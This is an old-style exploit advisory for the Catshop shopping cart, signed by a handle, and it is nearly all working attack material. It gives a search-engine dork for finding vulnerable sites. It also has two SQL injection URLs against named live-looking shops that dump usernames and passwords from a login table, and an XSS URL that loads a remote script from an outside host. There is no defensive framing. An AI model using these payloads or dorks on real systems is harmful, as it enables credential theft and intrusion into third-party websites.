----------------------------------------------------

Catshop  Cart SQL Injection&XSS

----------------------------------------------------

/* INTRO /*


By:     e.wiZz!
Info:   It's not my fault 'coz i'm bosnian and unemployed.  cheers
Site:   madspot.org
mail: ew1zz@hotmail.com

/* OUTRO /*


Script site:   www.mns.it
Info:   Catshop is Shopping Cart developed by mns.it....other info is in italian,i can't translate and i don't care
Dork:   intext:"MNS Media & Net service"   OR  allinurl:/cat_shop/
POC:

SQL Injection:
http://www.colferid.it/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*
http://sidermetal.biz/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*

XSS:
http://colferid.it/cat_shop/viewProduct.php?id=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E